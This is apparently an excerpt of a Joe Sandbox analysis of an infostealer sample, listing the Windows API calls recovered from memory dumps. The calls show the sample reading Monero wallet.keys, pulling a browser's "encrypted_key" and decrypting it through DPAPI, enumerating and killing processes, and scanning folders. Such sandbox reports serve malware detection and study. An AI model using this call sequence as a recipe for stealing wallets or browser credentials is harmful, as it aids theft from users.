                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00561580,00560D92), ref: 0054F54C
                          • lstrlen.KERNEL32(00000000), ref: 0054F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                          • Instruction ID: 69d75cf741c8010d092ac5da7bc7713bcca57574e9c3c40cf811166c58df3f1e
                          • Opcode Fuzzy Hash: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                          • Instruction Fuzzy Hash: AD51F371D10109AADB04FBA4DC6ADED7B78BF94301F408629FC1667195EE346A0DCBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 69cc1b772e12da903a639c29129e533173acfe20df5c3189c8121c7d4f2b389e
                          • Instruction ID: 08b6c86bdeeccb9fc78acbf3b94bd58a582eb566921ae051c42fee2712357c76
                          • Opcode Fuzzy Hash: 69cc1b772e12da903a639c29129e533173acfe20df5c3189c8121c7d4f2b389e
                          • Instruction Fuzzy Hash: FB415171D10109ABCB04EFA4D865AEEBB74BF54305F00851AE81677290EB74A609CFA2
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                            • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                            • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                            • Part of subcall function 00549B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                            • Part of subcall function 00549B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                            • Part of subcall function 00549B60: LocalFree.KERNEL32(?), ref: 00549BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: e9f7ebf986a43758ddb2e7d6880201ee5ddb5ea3209e9ea178b8164bfe84595b
                          • Instruction ID: 36b711720b59c65eec10004f8adef06eb18f7e9c59e0d867db544d095c9bd5af
                          • Opcode Fuzzy Hash: e9f7ebf986a43758ddb2e7d6880201ee5ddb5ea3209e9ea178b8164bfe84595b
                          • Instruction Fuzzy Hash: 353124B5D10209ABCF14DFE4DD96EEF7BB8BF88304F144519E905A7241EB349A04CBA5
                          APIs
                          • memset.MSVCRT ref: 005594EB
                            • Part of subcall function 00558D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                            • Part of subcall function 00558D50: RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                            • Part of subcall function 00558D50: wsprintfW.USER32 ref: 00558D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005595AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 005595C9
                          • CloseHandle.KERNEL32(00000000), ref: 005595D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                          • Instruction ID: 4bff82170f27304cb8d01bade7854c12514b4c2f8ca12b31bc89e52b6fbc95bd
                          • Opcode Fuzzy Hash: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                          • Instruction Fuzzy Hash: B1311071940208EFDB14DBD0CD59BEDB774FF44301F20855AE906AA184EB789A49CB55
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005605B7), ref: 005586CA
                          • Process32First.KERNEL32(?,00000128), ref: 005586DE
                          • Process32Next.KERNEL32(?,00000128), ref: 005586F3
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • CloseHandle.KERNEL32(?), ref: 00558761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                          • Instruction ID: 69418c66d48af56909c3f3ebe07d03f2d9dcaf19793ec767346d2dbd578380b9
                          • Opcode Fuzzy Hash: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                          • Instruction Fuzzy Hash: 69316F71911119ABDB24DF50CC65FEEBB78FB49701F10429AE90AA21A0DB346A49CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E00,00000000,?), ref: 005579B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005579B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00560E00,00000000,?), ref: 005579C4
                          • wsprintfA.USER32 ref: 005579F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                          • Instruction ID: 83dcc30871bcf1bd2f13c33be32feef1444f6ac2b1d1a96f59e62398c51665cd
                          • Opcode Fuzzy Hash: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                          • Instruction Fuzzy Hash: 3C1118B2944118AADB149FC9DD45BBEBBF8FB4CB11F10411AF605A2280E23D5940CBB5
                          APIs
                          • __getptd.LIBCMT ref: 0055C74E
                            • Part of subcall function 0055BF9F: __amsg_exit.LIBCMT ref: 0055BFAF
                          • __getptd.LIBCMT ref: 0055C765
                          • __amsg_exit.LIBCMT ref: 0055C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0055C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                          • Instruction ID: 9075b19bca1c2e1648a47cb651a9ceb0be81e56fa4b7b0f54fc78a1d3ff9cfb6
                          • Opcode Fuzzy Hash: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                          • Instruction Fuzzy Hash: E2F096329107129FE720BBB8581E7493FA0BF44717F14414FFC14A75D2DB6459489F56
                          APIs
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00554F7A
                          • lstrcat.KERNEL32(?,00561070), ref: 00554F97
                          • lstrcat.KERNEL32(?,01238C28), ref: 00554FAB
                          • lstrcat.KERNEL32(?,00561074), ref: 00554FBD
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                            • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                            • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                            • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                          • Instruction ID: c764d443fec126576a83e8c0cf76ee99363e59a14047bbfa82e47d8c3e9b7282
                          • Opcode Fuzzy Hash: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                          • Instruction Fuzzy Hash: 6821DA7694020977D754FBB0DC5AEEE373CBB94300F008546B65A93181EE789ACC8FA6